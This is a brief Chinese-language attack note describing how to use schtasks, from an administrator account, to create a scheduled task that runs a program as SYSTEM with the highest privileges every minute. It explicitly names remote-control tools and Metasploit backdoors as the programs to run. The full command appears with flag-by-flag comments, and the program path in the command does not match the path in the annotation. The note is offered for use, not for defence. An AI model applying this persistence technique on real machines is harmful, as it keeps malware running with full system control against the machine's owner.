使用administrator创建以system用户身份运行程序的计划任务，可以运行如远控或msf后门等

命令：

schtasks /create /tn "system" /tr C:\Windows\system321.exe\system321.exe /sc MINUTE /mo 1  /ru "System" /RL HIGHEST

注释：

/create #创建任务

/tn "system"     #指定任务名称为system

/tr C:\Windows\system\system.exe     #指定程序路径

/sc MINUTE /mo 1     #指定类型；MINUTE表示任务每n分钟运行一次，/mo 1表示每1分钟执行一次

/ru "System"     #指定为system用户运行该任务

/RL HIGHEST     #运行级别，HIGHEST为使用最高权限运行